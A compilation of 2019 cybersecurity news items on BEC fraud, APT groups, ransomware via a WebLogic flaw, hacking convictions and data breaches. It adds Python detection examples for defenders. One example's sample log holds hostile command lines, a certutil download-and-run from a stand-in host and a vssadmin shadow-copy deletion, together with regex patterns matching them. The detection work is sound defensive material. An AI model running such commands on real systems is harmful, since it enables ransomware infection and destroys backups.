Nigerian BEC Fraudsters Resorting to RATs as the Tool to Amplify Attacks



The number of Business Email Compromise (BEC) frauds has risen at an alarming rate, and the fraudsters behind them have resorted to Remote Access Trojans (RATs) to amplify their attacks.

The FBI’s Internet Crime Complaint Center (IC3) has attempted to reduce the damage done by these attacks by forming a Recovery Asset Team to deal with the consequences of BEC scams. However, the number of scammers involved in these attacks is greater than ever before.

The attacks, which have seen an unprecedented upsurge, are regarded as a global threat, with Nigeria practicing them extensively; in that country, making money via BEC scams has become the norm. After examining cybercrime in Nigeria, Palo Alto Networks’ Unit 42 recorded the country’s evolution toward using ransomware and other malware to reach financial objectives.

In 2018, the number of groups involved in BEC scams reached 400, a hundred more than the previous year, and their activity grew by 54% compared with 2017.

With a monthly average of 28,227 attacks, the most affected sector was high-tech, which recorded over 120,000 attacks in the previous year; the second most targeted was the wholesale industry, with around 80,000 attacks, and the third was manufacturing, with a total of 57,000 attacks.

Monitoring the attacks, Verizon says in a report, “Given the sheer number of incidents in this sector, you would think that the government incident responders must either be cape and tights wearing superheroes, or so stressed they’re barely hanging on by their fingernails.”

“Admittedly we do not have as much data as to what is happening beyond the deception and initial device compromise. The inclusion of keylogging malware is a good indicator that additional credential theft and reuse is a likely next step.”




Buckeye APT hackers stole NSA hacking tools before the Shadow Brokers leaked them




Buckeye, a Chinese state-sponsored APT group, was using Equation Group tools a year before the Shadow Brokers leaked them in 2017.

The Shadow Brokers is a mysterious group of hackers who stole malware, hacking tools and zero-day exploits from the Equation Group, which is a branch of the NSA and one of the most advanced and sophisticated cyber attack groups in the world.

Active since 2009, the Buckeye group, also known as APT3, used these tools to carry out multiple attacks on the organizations on its target list, mainly based in the United States, in order to gain unauthorized access to their networks.

Besides exploiting zero-day vulnerabilities in 2014, the Buckeye group a couple of years later used Trojan.Bemstour, a custom exploit tool, to reach its targets.

To achieve remote kernel code execution on victims' systems, Bemstour exploited two Windows zero-day vulnerabilities, CVE-2019-0703 and CVE-2017-0143. These were later employed by EternalRomance and EternalSynergy, two NSA-owned exploit tools.

According to the findings of Symantec’s report, “Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor. DoublePulsar is then used to inject a secondary payload, which runs in memory only. The secondary payload enables the attackers to access the affected computer even after DoublePulsar is removed.”

“The variant of DoublePulsar used in the first attacks performed by Buckeye was different to that leaked by the Shadow Brokers. It appears to contain code to target newer versions of Windows (Windows 8.1 and Windows Server 2012 R2), indicating that it is a newer version of the malware.”

A Hacker Group, 'Barium' on a Supply Chain Hijacking Spree



One of the most damaging forms of hacking is the software supply chain attack, which involves illicitly accessing a developer's network and planting malicious code in the software updates and applications that users trust the most.

In a single operation, supply chain hackers can potentially place their ransomware on thousands or millions of computer systems without leaving a single trace of malicious activity. Over time, this trick has gained a lot of traction and has become more advanced and harder to identify. Supply chain attacks follow a similar pattern and have been used by the groups involved as their core tool.

Basically, supply chain attacks exploit various software distribution channels, and over the last three years these attacks have largely been linked to a group of Chinese hackers known variously as ShadowHammer, Barium, Wicked Panda and ShadowPad, depending on the security firm.

The technique demonstrates ShadowHammer's massive potential to damage computer systems on a large scale by exploiting weaknesses in the fundamental model that governs which code users run on their systems; such destructive capability in Barium's hands is a matter of great concern for security researchers.

In the words of Vitaly Kamluk, director of the Asia research team at security firm Kaspersky: "They're poisoning trusted mechanisms. They’re the champions of this. With the number of companies they’ve breached, I don’t think any other groups are comparable to these guys."

"When they abuse this mechanism, they’re undermining trust in the core, foundational mechanisms for verifying the integrity of your system."

"This is much more important and has a bigger impact than regular exploitation of security vulnerabilities or phishing or other types of attacks. People are going to stop trusting legitimate software updates and software vendors."

When asked about the group, security researcher Marc-Etienne Léveillé said: "In terms of scale, this is now the group that is most proficient in supply chain attacks."

"We’ve never seen anything like this before. It’s scary because they have control over a very large number of machines."

"If [Barium] had deployed a ransomware worm like that through one of these attacks, it would be a far more devastating attack than NotPetya," said another expert on the matter.


Attackers Exploiting Oracle Weblogic Server Vulnerability to Encrypt User Data



Attackers are exploiting a remote code execution vulnerability in Oracle WebLogic Server to install a new variant of a malware known as "Sodinokibi".

The recently discovered vulnerability affects Oracle WebLogic Server versions 10.3.6.0 and 12.1.3.0 and allows anyone with HTTP access to the server to execute the attack without authentication. Reportedly, a patch was issued by the software company on April 26.

According to the findings of Cisco Talos, the attacks began around April 25, and on the following day, April 26, the attackers established connections to multiple vulnerable HTTP servers.

The attackers exploited the vulnerability to download copies of the malware from servers under their control, and also to compromise various legitimate sources and alter them for their own purposes.

“Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136 and the attackers were ultimately successful at encrypting a number of customer systems.”

How does the ransomware infect?

It begins with an HTTP POST request carrying a certutil command that downloads the malicious file and then executes it.

As soon as the malicious process starts, it invokes the vssadmin.exe utility, the Windows tool that manages Volume Shadow Copies, which Windows uses for automatic or manual backups.

The ransomware then attempts to hinder recovery by disabling this backup mechanism.

Users can consult the security alert posted by Oracle and are advised to patch the aforementioned vulnerability, CVE-2019-2725.
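To show how the chain just described (a shell spawned by the WebLogic JVM, a certutil download, then vssadmin deleting shadow copies) would surface in endpoint telemetry, here is an added detection example; it is not code from Talos or from this page, the process records are constructed in a simplified Sysmon-style pid|ppid|image|command-line layout, and the download host 203.0.113.10 is a documentation address, not a real indicator.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-cased
    cmdline: str


# Constructed process-creation records, one per line: pid|ppid|image|command line.
# 203.0.113.10 is a documentation address standing in for the attacker's server.
SAMPLE_LOG = r"""
4100|900|java.exe|"C:\Oracle\jdk\bin\java.exe" -Dweblogic.Name=AdminServer weblogic.Server
5200|4100|cmd.exe|cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/radm.exe C:\Windows\Temp\radm.exe & C:\Windows\Temp\radm.exe
5210|5200|certutil.exe|certutil -urlcache -split -f http://203.0.113.10/radm.exe C:\Windows\Temp\radm.exe
5300|5200|radm.exe|C:\Windows\Temp\radm.exe
5310|5300|vssadmin.exe|vssadmin.exe Delete Shadows /All /Quiet
6000|2000|explorer.exe|C:\Windows\explorer.exe
6010|6000|certutil.exe|certutil -hashfile C:\Users\alice\setup.msi SHA256
"""

SERVER_IMAGES = {"java.exe"}                 # WebLogic runs inside a JVM
SHELLS = {"cmd.exe", "powershell.exe"}
# certutil fetching a URL into its cache is the download step of the chain.
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\s.*-urlcache.*https?://", re.I)
# Deleting shadow copies is how the ransomware disables the backup mechanism.
VSS_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)


def parse_log(text: str) -> List[ProcEvent]:
    events = []
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(int(pid), int(ppid), image.lower(), cmdline))
    return events


def ancestors(by_pid: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Follow parent links upward from pid, guarding against pid-reuse loops."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs for each stage of the chain seen in the log."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and parent.image in SERVER_IMAGES and e.image in SHELLS:
            findings.append((e.pid, "application server spawned a shell"))
        if CERTUTIL_DOWNLOAD.search(e.cmdline):
            findings.append((e.pid, "certutil fetching a remote file"))
        if VSS_DELETE.search(e.cmdline):
            # Tie the backup-tampering step back to the server process so a manual
            # admin run of vssadmin is reported differently from the full chain.
            rooted = any(a.image in SERVER_IMAGES for a in ancestors(by_pid, e.pid))
            suffix = " by a process descended from the app server" if rooted else ""
            findings.append((e.pid, "shadow copies deleted" + suffix))
    return findings


if __name__ == "__main__":
    for pid, finding in detect(parse_log(SAMPLE_LOG)):
        print(pid, finding)
```

The legitimate certutil -hashfile run under explorer.exe (pid 6010) is not flagged, which is the point of matching on the download switch rather than on the binary name alone.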

Russian hacker convicted of hacking a payment system and stealing from ATMs


A court in the Saratov region found a local resident guilty of hacking into the website of an Omsk company that collects utility payments.

The 19-year-old hacker was charged under the article on "unauthorized access to computer information." Officers of the Federal Security Service (FSB) of Russia in the Omsk region identified and detained him.

Omsk investigators found that in the autumn of 2017 the defendant hacked into the payment system from his home computer using special software. The system was used for online payment of utility bills.

As a result, the hacker gained access to users' personal accounts. After copying all the information, he contacted representatives of the service and offered, for a fee, to explain how to fix the vulnerability in the security system.

The court found him guilty and sentenced him to twelve months for unauthorized access to computer information.

Meanwhile, in Krasnoyarsk, a hacker group was found to have hacked the management system of ATMs using special devices.

According to Irina Volk, the official representative of the Ministry of Internal Affairs of Russia, a criminal group of three men aged 24 to 57 committed 27 crimes between October 2017 and February 2018. At the time of their arrest, the defendants had been linked to 8 similar crimes with total damage of 15 million rubles; since then, the number of crimes and the damage attributed to them have doubled.

The hackers worked at night, using software to disable the security system and then opening the payment terminals.

The criminals were detained by police while committing another theft. During searches, police seized computer equipment, tools and two expensive cars bought with the stolen money.

The hackers are awaiting the court's verdict in custody. They are charged under six articles.

Hacker from Novovoronezh convicted of a cyber attack on a library

A resident of Novovoronezh received a one-year sentence for a cyber attack on the Kurgan Regional Universal Scientific Library. The crime was solved by officers of the FSB in the Voronezh region.

According to the press service of the Voronezh Prosecutor's Office, in February 2018, 24-year-old Mikhail Nazarov installed malicious software on his PC that allowed him to destroy, block, modify or copy information and to bypass its protection. He found the Internet resource of the Government of the Kurgan region, namely the library's website, and carried out a series of cyber attacks. Why he chose this resource is not specified.

However, the hacker came to the attention of the FSB, whose officers stopped the cyber attacks and detained him. Law enforcement authorities opened a criminal case under the article on “Creating, using and distributing malicious computer programs”. The maximum penalty under this article is 4 years of imprisonment.

The court found the young man guilty and sentenced him to a suspended one-year prison term. Nazarov received a shorter sentence because he admitted his guilt.

As a reminder, the Voronezh regional court earlier sentenced a 30-year-old local resident to one and a half years of imprisonment and a fine of 10 thousand roubles for hacker attacks on state websites in Siberia and the Far East. The hacker also managed to compromise the websites of commercial organizations, using the hacked services for personal gain, including cryptocurrency mining.

Fancy Bear hackers accused of attacking the Ministry of Defense of Spain

The authoritative Spanish online publication Español, citing anonymous sources, reported on April 12 that Russian hackers from Fancy Bear were responsible for the attacks on the Spanish Ministry of Defense at the beginning of the year.

Investigators reached this conclusion after analyzing the attackers' methods: the hackers used the same scheme as in the hacking of the US Democratic Party's servers in 2016, after which the group became known worldwide.

It is noted that the malware was introduced via external e-mail in order to gain access to the "technological secrets of the military industry."

According to experts, the Defense Ministry's computers were under the complete control of the hackers for three months, and only in March did it become known that the ministry's computer network had been compromised by malware.

It should be noted that foreign politicians and journalists associate the Fancy Bear group with the Russian authorities and believe that the cybercriminals' purpose is "to undermine democracy." However, the connection between Fancy Bear and the Russian authorities or intelligence services has not been proven; this claim is based solely on speculation and assumptions.

Moscow region ambulance patient database leaked to the Internet

A database of patients of the Moscow region ambulance service is publicly available on the Web, stored on a file hosting service as a 17.8 GB file. It contains information such as the name of the person who called the ambulance, the contact phone number, the address, the date and time of the call, and a description of the patient's condition on the doctors' arrival.

A representative of the Ministry of Health said that the ambulance service's management system applied all measures required by current law to protect information, that citizens' data is securely protected and that only authorized employees have access to it.

Group-IB explained that the leak occurred through a MongoDB database management system.

Anastasia Tikhonova, head of Group-IB's threat research group, said that the database was effectively open to the public and required no authorization or other security settings.

She added that a group of Ukrainian hacktivists, THack3forU, leaked the database online. Hacktivists are activists who use computer hacking to promote the ideology of free speech and political freedom; such cybercriminals use leaks for dirty political purposes.

Andrei Arsentiev, an analyst at InfoWatch, explained that the leak happened because the operator left the MongoDB cloud server unprotected, having forgotten to set a password on it.

Denis Legato, an anti-virus expert at Kaspersky Lab, stressed that the main problem in this situation was administrators' inattention to security settings.

It is worth noting that a month ago a leak of the patient database in the Lipetsk region became known, as a result of which the head of the Health Department's material and technical support division lost his post.

Hackers broke into the Bashauto database


Bashauto (Bashavtotrans), the largest transport company in the Republic of Bashkortostan, was hacked. The attackers disrupted the "1C" accounting system, which handles the company's economic and organizational activity.

The hackers are demanding 1 million rubles from the largest supplier of buses on the roads of Bashkiria. Interestingly, the company denied being hacked.

Company employees said they recorded a technical failure, which was fixed only on April 4; the problems with purchasing and booking bus tickets in the bus station system began on April 1.

An unnamed source said that the company's accounting staff were sent on administrative leave, which is why the accounting department did not answer the phone. A Bashauto representative explained this by saying that the contact numbers on the company's website are outdated and will soon be updated.

Computer security expert Artur Kareev noted that hackers who break into the websites of state institutions undermine the country's reputation and raise their own standing among programmers. He offered three ways to address the problem: first, install an antivirus to protect yourself; second, moderation and administration of the site will help strengthen its protection; finally, the use of a complex programming language and a server that does not leave the internal network will also help resist hackers.

Hackers in Ukraine are attacking Government websites


On the eve of the presidential elections in Ukraine, phishing attacks on government Internet resources have intensified.

According to the head of the Computer Forensics Laboratory, the intensity of cyber attacks increases every year; it is a constant process and is not necessarily tied to the elections. However, at the moment the sites of the Central Election Commission, the Presidential Administration, the Cabinet of Ministers and infrastructure departments may be under attack.

In general, the cyber defense of government departments is now much better than a few years ago, since it was improved with European financial assistance; many different protection projects have been funded.

At the same time, the websites of presidential candidates are at risk of hacker attacks on the eve of the elections. It also turned out that politicians may simulate hacker attacks on their own resources for PR purposes, to emphasize their importance.

US Court Authorizes Microsoft to be in Charge of 99 Hacking Sites


Microsoft has been legally given control of 99 websites that were being operated by an Iranian hacking group, Phosphorus.

To prevent the sites from being used to carry out cyber attacks, a US court authorized Microsoft's Digital Crimes Unit to take charge of these websites, which belonged to the group also known as Charming Kitten, Ajax Security Team and APT 35.

Phosphorus typically uses spear-phishing to break into individuals' private accounts. Its operators rely on social engineering to lure individuals into clicking links, at times sent from fake accounts that appear to belong to familiar contacts; the link delivers malicious software that lets Phosphorus access the victim's computer.

Its aim is to gain access to sensitive data stored on the computer systems of government agencies and businesses.

Putting the matter in context in a blog post, Tom Burt, Corporate Vice President for Customer Security and Trust at Microsoft, said: "Its targets also include activists and journalists - especially those involved in advocacy and reporting on issues related to the Middle East."

"Microsoft's Digital Crimes Unit (DCU) and the Microsoft Threat Intelligence Center (MSTIC) have been tracking Phosphorus since 2013."

"Phosphorus also uses a technique, whereby it sends people an email that makes it seem as if there's a security risk to their accounts, prompting them to enter their credentials into a web form that enables the group to capture their passwords and gain access to their systems," Burt wrote in his blog post.


Commenting on the matter, Microsoft said, "The action we executed last week enabled us to take control of 99 websites and redirect traffic from infected devices to our Digital Crime Unit's sinkhole."

Ukrainian cyber police again caught Russian hackers

This is not the first time the Ukrainian cyber police have announced the exposure of a group of Russian hackers.

According to police officers, the hackers created a mailbox using an anonymizer and operated from the territory of Russia.

It turned out that they sent fake emails on behalf of Interior Minister Arsen Avakov. The emails contained rules of conduct for police officers during the elections and, in addition, required the police to take certain actions in favor of one of the candidates.

Some on the Internet believe the news is fake. As many people know, real hackers do not even need to create a mailbox to send messages: they could go to the police server and send emails directly, or do so from any other host on which port 25, used by the SMTP protocol, is open.

Perhaps Ukrainian citizens decided to play a joke this way: they simply installed a browser with a VPN and created a mailbox, which is enough to hide one's location. In any case, the incident became another reason to accuse Russia of interfering in the Ukrainian presidential election.

Krasnoyarsk hacker tried to hack the State procurement site

A Krasnoyarsk court sentenced a local resident to prison for attempting to hack the state procurement website of the Vladimir region; he was caught by the FSB.

According to the prosecutor, in February 2016 the hacker installed on his computer a special program for illegally copying files from other electronic devices. He then tried to hack the state procurement website of the Vladimir region administration to obtain logins and passwords for some of its data. The attempt to hack the state resource was identified and stopped by FSB officers.

It should be noted that the defendant was an information security officer at a large Russian bank.

The court found the man guilty and sentenced him to 2 years of imprisonment with a fine of 50 thousand rubles.

The hacker disagreed with the decision and appealed the verdict, but the regional court rejected his arguments and upheld the decision of the court of first instance.



Zero-day Stored XSS Vulnerability Allowed Attackers to Compromise 70,000 Websites



Researchers found that "Social Warfare", a social sharing plug-in by Warfare Plugins, contains a critical stored XSS zero-day flaw that allows cybercriminals to inject malicious scripts and take over vulnerable WordPress websites.

'Social Warfare' is a social sharing plugin that website owners use to drive more traffic by gaining more social shares.

Among the plugin's debugging features is exploitable code that allows the payload to be stored in the website's database and retrieved with every page request.

According to Sucuri's research, “These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability.”

The exploit, which spread rapidly across the globe, has allowed hackers to gain complete control of poorly protected websites.

As abuse of the exploit continued, analysts noticed multiple ongoing attempts from over a hundred distinct IP addresses.

Reportedly, around 70,000 websites have the plugin installed, and the attacks are likely to multiply if the flaw is left unpatched. Users are advised by experts to update to version 3.5.3.


Hackers Tracking Location History via Google Photos Vulnerability


A vulnerability has been found in the web version of Google Photos that lets malicious websites access sensitive information about a user's photos, such as the date and geographic coordinates where they were taken.

Google Photos automatically tags your photos on the basis of this metadata.

A photo's metadata travels with the image file and can be read by end users, hardware and software.

How the Hack Functions

First, the attacker has to trick the user into visiting a malicious website while logged into their Google Photos account.

Once the malicious website opens in the browser, it answers the attacker's questions by stealthily issuing requests to the Google Photos search endpoint.

As Imperva's report states, the attacker can keep a record of the queries already asked and resume the process on the user's next visit to any of the attacker's malicious websites.

Reportedly, the vulnerability has been patched by Google after Imperva brought it to their knowledge.

Enterprise VPN Provider Citrix, Hacked; 6TB of Sensitive Data Stolen



Enterprise VPN provider Citrix was subjected to a hack that is suspected to have stolen private data relating to the company’s technology.

On Friday, Citrix said that the FBI had informed it of "international cyber criminals" working their way into the organization’s networks.

Citrix was further told that the criminals most probably used the technique of “password spraying”, in which a few common passwords are tried against many accounts, to break into the company’s networks; they did so by correctly guessing the password of an account belonging to the company.

The hackers involved are reported to be part of an Iranian hacking group that has attacked over 200 companies, along with multiple government agencies, technology firms and oil and gas companies.

According to a blog post by Resecurity, the cybersecurity firm had contacted Citrix to warn it about the hack that was under way.

While declining to say how it learned of the hack, the firm said that it "has shared the acquired intelligence with law enforcement and partners for mitigation."

While the FBI declined to comment on the matter, Resecurity drew a connection between the hackers and a nation state "due to strong targeting on government, military-industrial complex, energy companies, financial institutions and large enterprises involved in critical areas of economy."

Citrix said the attackers may have accessed and downloaded business documents, stating in a notice: "The specific documents that may have been accessed, however, are currently unknown."

"Citrix has taken action to contain this incident. We commenced a forensic investigation; engaged a leading cybersecurity firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI," the company added in the notice.
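As an added illustration of how a defender would spot the password spraying described above in authentication logs (example code, not Citrix's or Resecurity's; the log is constructed in an assumed time/user/source/result layout and the source addresses are documentation ranges):

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

# Constructed authentication log, one attempt per line: time user source result.
# 203.0.113.7 sprays one guess across many accounts; 198.51.100.2 hammers one account.
SAMPLE_AUTH_LOG = """
2019-03-08T02:00:01Z alice 203.0.113.7 FAIL
2019-03-08T02:00:09Z bob 203.0.113.7 FAIL
2019-03-08T02:00:17Z carol 203.0.113.7 FAIL
2019-03-08T02:00:25Z dave 203.0.113.7 FAIL
2019-03-08T02:00:33Z erin 203.0.113.7 FAIL
2019-03-08T02:00:41Z frank 203.0.113.7 SUCCESS
2019-03-08T02:01:00Z alice 198.51.100.2 FAIL
2019-03-08T02:01:05Z alice 198.51.100.2 FAIL
2019-03-08T02:01:10Z alice 198.51.100.2 FAIL
2019-03-08T02:01:15Z alice 198.51.100.2 FAIL
2019-03-08T02:01:20Z alice 198.51.100.2 FAIL
2019-03-08T02:01:25Z alice 198.51.100.2 FAIL
2019-03-08T09:15:00Z alice 192.0.2.44 SUCCESS
"""

Attempt = Tuple[datetime, str, str, bool]   # (time, user, source, succeeded)


def parse_auth_log(text: str) -> List[Attempt]:
    attempts = []
    for line in text.strip().splitlines():
        ts, user, src, result = line.split()
        t = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        attempts.append((t, user, src, result == "SUCCESS"))
    return attempts


def find_password_sprays(attempts: List[Attempt],
                         window: timedelta = timedelta(minutes=30),
                         min_users: int = 5,
                         max_per_user: int = 2) -> Dict[str, Tuple[Set[str], Set[str]]]:
    """Flag sources whose failures inside any `window` touch at least `min_users`
    accounts with no more than `max_per_user` failures each (the spray signature:
    many accounts, few guesses apiece, so per-account lockouts never trigger).
    Returns {source: (sprayed users, users that logged in successfully from that
    source at or after the start of the spray)}."""
    by_src: Dict[str, List[Tuple[datetime, str, bool]]] = defaultdict(list)
    for t, user, src, ok in attempts:
        by_src[src].append((t, user, ok))
    flagged: Dict[str, Tuple[Set[str], Set[str]]] = {}
    for src, rows in by_src.items():
        rows.sort()
        fails = [(t, u) for t, u, ok in rows if not ok]
        counts: Dict[str, int] = defaultdict(int)
        start = 0
        for t, u in fails:                      # sliding window over failures
            counts[u] += 1
            while t - fails[start][0] > window:
                old = fails[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                since = fails[start][0]
                hits = {u2 for t2, u2, ok in rows if ok and t2 >= since}
                prev = flagged.get(src, (set(), set()))
                flagged[src] = (prev[0] | set(counts), prev[1] | hits)
    return flagged


if __name__ == "__main__":
    for src, (users, hits) in find_password_sprays(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(src, "sprayed", sorted(users), "successful logins:", sorted(hits))
```

The single-account brute force from 198.51.100.2 is deliberately left to a separate per-account rule; counting distinct accounts per source is what makes a low-and-slow spray visible.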



Anonymous Threat Group Compromised 1 Million Web Pages of Popular Brands like Coca-Cola and McDonald’s



Around 1 million Israeli web pages owned by renowned brands such as McDonald’s and Coca-Cola have been compromised by an anonymous group of hackers, who breached the brands' sites for Israeli users under the ‘co.il’ domain, such as Cocacola.co.il and McDonalds.co.il.

The hacker group abused a third-party accessibility plug-in, ‘nagich.co.il’, which loaded malicious JavaScript that compromised the sites and enabled the threat actors to deface a million web pages.

A critical vulnerability in Nagich, an accessibility plug-in for users with disabilities, gave access to more than 1 million Israeli web pages and was the primary means by which the attackers defaced them.

Besides the websites of renowned brands (Coca-Cola, McDonald’s and Toys"R"Us), other popular websites, namely Ynet and Calcalist, also fell victim to this breach. Reportedly, the attackers defaced these websites to display political messages.

Nagich is not an ordinary website: it hosts an accessibility plugin, a JavaScript file that runs on every website that opts into the service and provides it with a multitude of accessibility options.

Because the embedding site grants the plugin the necessary permissions, the severe vulnerability allowed code to run on that site, meaning it could make any change to the site and do whatever it wanted. The hackers exploited it to swap malicious code into the embedded script in order to deface the web pages.

Nagich's delay in taking remedial measures to patch the vulnerability in effect allowed the hackers to compromise hundreds of web pages.



The Kremlin reported hacker attacks on the website of the President of Russia



Foreign hackers are constantly attacking the website of Russian President Vladimir Putin, and intelligence agencies record a large number of attacks from Europe and the United States, the Kremlin said.

As the Russian leader's press secretary, Dmitry Peskov, noted, Western countries like to talk about "Russian hackers", but foreign partners themselves are waging an information war against Russia.

"A huge number of cyber attacks on Russian organizations, individuals and legal entities are constantly organized from the territory of the United States," he said.

According to him, hackers from Europe and North America regularly attempt intrusions, and a new draft law on an autonomous RUnet is aimed at countering this.

The draft law on the autonomous operation of the Russian segment of the Internet, should it be disconnected from the global network infrastructure, was submitted to the State Duma on December 14, 2018. The document is aimed at ensuring the stable operation of the Internet in Russia in case of external threats; it defines the necessary traffic routing rules and establishes control over compliance with them.

Attacks on the US Companies by Chinese and Iranian Hackers Renewed


Following Trump's withdrawal of the U.S. from the Iran nuclear deal last year and the trade disputes between the U.S. and China, Iranian and Chinese hackers have heavily attacked corporations and government agencies in the United States. Security experts believe these hackers have been spurred on by those conflicts.

According to seven people briefed on the incidents, who were not permitted to discuss the details publicly, the recent attacks targeting multiple US corporations, government agencies, American banks and various businesses were more aggressive than those carried out in the past.

Analysts and security researchers at the National Security Agency traced the attacks to Iran. Meanwhile, FireEye, a privately owned security firm, prompted an emergency order, issued by the Department of Homeland Security, when the government shutdown took place last month.

Reportedly, these Iranian attacks occurred simultaneously with a renewed Chinese offensive aimed at stealing sensitive military and trade data from U.S. tech companies and military contractors.

Commenting on the matter, Joel Brenner, a former head of United States counterintelligence under the director of national intelligence, said: “Cyber is one of the ways adversaries can attack us and retaliate in effective and nasty ways that are well below the threshold of an armed attack or laws of war.”


A Ukrainian man stole half a million from crypto-wallets



A man who stole 500 000 UAH (18 350 USD) from the crypto-wallets of clients of an online cryptocurrency exchange was detained in the Kiev region.

The Ukrainian cyber police stated that the 35-year-old man provided technical support to a British exchange offering online cryptocurrency trading and had access to customers' personal data, which he used to steal from Bitcoin and various altcoin accounts. In this way he stole 500 000 UAH over several months.

The theft of cryptocurrency took place in several stages. First, the attacker looked for accounts of clients who had not logged in for a long time and did not use strong authentication.

He then replaced the backup e-mail addresses on those accounts, or added one where none was set. Using these, he reset the wallet passwords and initiated the debiting of the funds.

Conversion and withdrawal of money took place through an online exchange.

The damage currently stands at 720 000 UAH (26 400 USD). The attacker spent the stolen funds gambling on virtual slot machine simulators.
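An added example, not from the cyber police report, of how an exchange could flag the pattern described above: a recovery e-mail change or addition on a long-dormant account, followed quickly by a password reset or withdrawal. The event log layout (time account event_type), the thresholds and the account names are all constructed assumptions.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed account-activity events, one per line: time account event_type.
SAMPLE_EVENTS = """
2018-06-01T02:00:00Z acct-1001 login
2019-02-10T03:10:00Z acct-1001 recovery_email_changed
2019-02-10T03:12:00Z acct-1001 password_reset
2019-02-10T03:20:00Z acct-1001 withdrawal
2019-02-09T18:00:00Z acct-2002 login
2019-02-10T09:00:00Z acct-2002 recovery_email_changed
2019-02-10T09:05:00Z acct-2002 password_reset
2017-11-20T00:30:00Z acct-3003 login
2019-02-11T01:00:00Z acct-3003 recovery_email_added
2019-02-11T01:40:00Z acct-3003 withdrawal
"""

Event = Tuple[datetime, str, str]
RECOVERY_CHANGES = {"recovery_email_changed", "recovery_email_added"}
FOLLOW_ON = {"password_reset", "withdrawal"}


def parse_events(text: str) -> List[Event]:
    events = []
    for line in text.strip().splitlines():
        ts, acct, kind = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), acct, kind))
    events.sort()                       # process in time order
    return events


def flag_dormant_takeovers(events: List[Event],
                           dormant_after: timedelta = timedelta(days=180),
                           follow_within: timedelta = timedelta(hours=24)
                           ) -> Dict[str, Tuple[int, List[str]]]:
    """Flag accounts where a recovery address is changed or added after no login
    for `dormant_after`, and a password reset or withdrawal follows within
    `follow_within`. Returns {account: (days since last login, follow-on events)}."""
    last_login: Dict[str, datetime] = {}
    pending: Dict[str, Tuple[datetime, int]] = {}   # recovery change awaiting follow-on
    flagged: Dict[str, Tuple[int, List[str]]] = {}
    for t, acct, kind in events:
        if kind == "login":
            last_login[acct] = t
            pending.pop(acct, None)     # a genuine login ends the dormancy window
        elif kind in RECOVERY_CHANGES:
            # An account with no login on record scores zero days dormant here;
            # a production rule would more likely fall back to the registration date.
            gap = t - last_login.get(acct, t)
            if gap >= dormant_after:
                pending[acct] = (t, gap.days)
        elif kind in FOLLOW_ON and acct in pending:
            change_t, days = pending[acct]
            if t - change_t <= follow_within:
                flagged.setdefault(acct, (days, []))[1].append(kind)
    return flagged


if __name__ == "__main__":
    for acct, (days, steps) in flag_dormant_takeovers(parse_events(SAMPLE_EVENTS)).items():
        print(acct, f"dormant {days} days, then", " -> ".join(steps))
```

acct-2002 changes its recovery address the day after a real login and is not flagged; the rule only fires when the recovery change itself breaks a long silence, which is the step the attacker relied on.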